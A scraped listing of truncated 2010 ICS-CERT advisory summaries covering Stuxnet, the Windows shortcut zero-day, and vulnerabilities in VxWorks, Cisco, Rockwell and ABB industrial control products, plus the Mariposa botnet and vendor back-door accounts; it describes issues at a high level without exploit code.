us-cert

Overview In July, ICS-CERT published an advisory and a series of updates regarding the Stuxnet malware entitled “ICSA-10-201 USB Malware Targeting Siemens Control Software.” Since then, ICS-CERT has continued analysis of the Stuxnet malware in an effort to determine more about its capabilities and intent. As the analysis has progressed, understanding of the malware sophistication has continued to increase. Stuxnet makes use of a previously unpatched Windows vulnerability and a digitally signed kernel-mode rootkit. There have been two digital certificates used to sign this rootkit. The original certificate was revoked. Subsequently, a second variant was discovered in which the same rootkit was signed with a different key, which has also been revoked. With approximately 4,000 functions, Stuxnet contains as much code as some commercial software products. The complex code is object oriented and employs many programming techniques that demonstrate advanced knowledge in many areas, including...

Overview An asset owner recently notified the ICS-CERT that a vendor support contractor had added an administrative-level account during installation of new control systems software. The support contractor intended the account to be the default used to train their people for all future work on those systems. The addition of an administrative account to an ICS network with the password known by a contract company increases the cybersecurity risk to the asset owner. This advisory highlights existing practices that may adversely impact the cybersecurity of industrial control systems (ICS) environments relative to malicious actors. Impact All control systems maintained by vendors, integrators, or other contractors can potentially be impacted by the practice of adding “back door” administrative accounts for future access to perform maintenance, updates, or training. The impact to individual sites may vary, but the potential exists for an administrator-level username and password used by sup...

Overview VirusBlokAda, an antivirus vendor based in Belarus, announcedVirusBlokAda, http://www.anti-virus.by/en/tempo.shtml, website last visited July 15, 2010. the discovery of malware that uses a zero-day vulnerability in Microsoft Windows processing of shortcut files. The malware utilizes this zero-day vulnerability and exploits systems after users open a USB drive with a file manager capable of displaying icons (like Windows Explorer). US-CERT has released a Vulnerability NoteVulnerability Note, http://www.kb.cert.org/vuls/id/940193, website last visited July 16, 2010. detailing the vulnerability and suggested workarounds. Microsoft has also released a Security Advisory (2286198)Microsoft Security Advisory, http://www.microsoft.com/technet/security/advisory/2286198.mspx, website last visited July 19, 2010. detailing the previously unknown vulnerability. ICS-CERT has confirmed the malware installs a trojan that interacts with installed SIMATIC® WinCC or SIMATIC® Siemens STEP 7 softw...

Overview A security researcher has identified two vulnerabilities affecting the Wind River Systems’ VxWorks platform. The vulnerabilities are a debug service enabled by default (VU#362332) and a weak hashing algorithm used in authentication (VU#840249). ICS-CERT has been coordinating with CERT/CC in alerting control systems vendors of these vulnerabilities. ICS-CERT will continue to coordinate and publish updates as needed. Affected Products VxWorks is a real-time operating system that can be used in embedded systems, including control system components. Because this vulnerability is embedded in other products, the actual list of affected products is large, and not completely known Not all products using VxWorks are vulnerable. ICS-CERT recommends that end users contact their vendors to determine if their products are affected by these vulnerabilities. CERT/CC has a partial list of vendors in the Vulnerability Notes referenced above. Impact Access to the debug service could result in i...

Overview Cisco has identified multiple security vulnerabilitiesCisco, http://www.cisco.com/en/US/products/products_security_advisory09186a0080b2c518.shtml, website last visited May 27, 2010. in the Cisco Network Building Mediator (NBM) products. These vulnerabilities also affect the legacy Richards-Zeta Mediator products. The following vulnerabilities have been identified: default credentials, privilege escalation, unauthorized information interception, and unauthorized information access. Successful exploitation of any of these vulnerabilities could result in a malicious user taking complete control over an affected device. Affected Products These vulnerabilities affect the legacy Richards-Zeta Mediator 2500 product and Cisco Network Building Mediator NBM-2400 and NBM-4800 models. All Mediator Framework software releases prior to 3.1.1 are affected by all vulnerabilities listed in this advisory. Impact Impact to individual organizations depends on many factors that are unique to each ...

OVERVIEW A buffer overflow vulnerability exists in the Rockwell Automation RSLinx Classic EDS Hardware Installation Tool (RSHWare.exe). This vulnerability is likely exploitable; however, significant user interaction would be required. AFFECTED PRODUCTS EDS Hardware Installation Tool Version 1.0.5.1 and earlier. IMPACT The CVSS impact subscore for this vulnerability, as calculated by ICS-CERT, is high (10) because successfully exploiting this vulnerability would allow an attacker to run arbitrary code on the target machine. However, the exploitability subscore is low (3.2) because of the difficulty of exploiting this vulnerability. Impact to individual organizations depends on many factors that are unique to each organization. ICS-CERT recommends that organizations evaluate the impact of this vulnerability based on their environment, architecture, and product implementation. BACKGROUND Rockwell Automation provides industrial automation control and information products worldwide across a...

Overview A cross-site scriptinghttp://www.owasp.org/index.php/Cross-siteScripting(XSS) vulnerability exists in the system used by the ABB Electrical Distribution Management System (DMS) product netCADOPS to generate online Help. Affected Products All releases of the ABB netCADOPS product. The ABB Network Manager DMS client products ORMap and OMI are not affected by this problem, because this vulnerability is related solely to netCADOPS web-based online Help. Further, no other ABB SCADA products, including, but not limited to, MicroSCADA Pro, RANGER, Network Manager NM-R, and 800xA are affected by this vulnerability. Impact At this time, ICS-CERT has not independently verified the vulnerability or update to determine the condition details and potential impact to organizations. ICS-CERT is providing this notice to make organizations aware of the vulnerability and patch release from ABB. ICS-CERT recommends that organizations contact ABB for additional details to evaluate the impact of th...

Overview ICS-CERT has received reports and investigated infections of the MariposaDefence Intelligence, http://defintel.com/docs/MariposaAnalysis.pdf, website last accessed March 15, 2010. botnet, which have affected the business networks of multiple control system owners in recent months. ICS-CERT has no information to indicate that these infections have specifically targeted United States Critical Infrastructure and Key Resources (CIKR), or any specific sector or organization. Background In May 2009, Defence Intelligence announced the discovery of a botnet, called “Mariposa.” An investigation followed this discovery and targeted bringing down the criminal network behind what has become one of the largest botnets on record. After months of investigation by the Guardia Civil in Spain, the FBI, security firm Panda Security, and Defence Intelligence, authorities took down a 12.7 million strong zombie network in December. In February 2010, Spanish authorities arrested three suspects in Sp...

Overview Rockwell Automation has identified a security vulnerability in the programming and configuration client software authentication mechanism employed by certain versions of the PLC-5 and SLC 5/0x family of programmable controllers. Affected Products Rockwell PLC-5 and SLC 5/0x controllers are affected, including the following catalog numbers: 1785-Lx and 1747-L5x. The programming and configuration client software, RSLogix, for these devices is also affected by this vulnerability. For a complete listing of affected products and firmware versions, please see Rockwell’s Technotes.Rockwell Technote, http://rockwellautomation.custhelp.com/app/answers/detail/a_id/66684/kw/vulnerability/r_id/115100, website last accessed March 4, 2010.,Rockwell Technote, http://rockwellautomation.custhelp.com/app/answers/detail/a_id/66678/kw/vulnerability/r_id/115100, website last accessed March 4, 2010. Impact A significant number of PLC-5s and SLC 500s are installed worldwide. Successful exploitation ...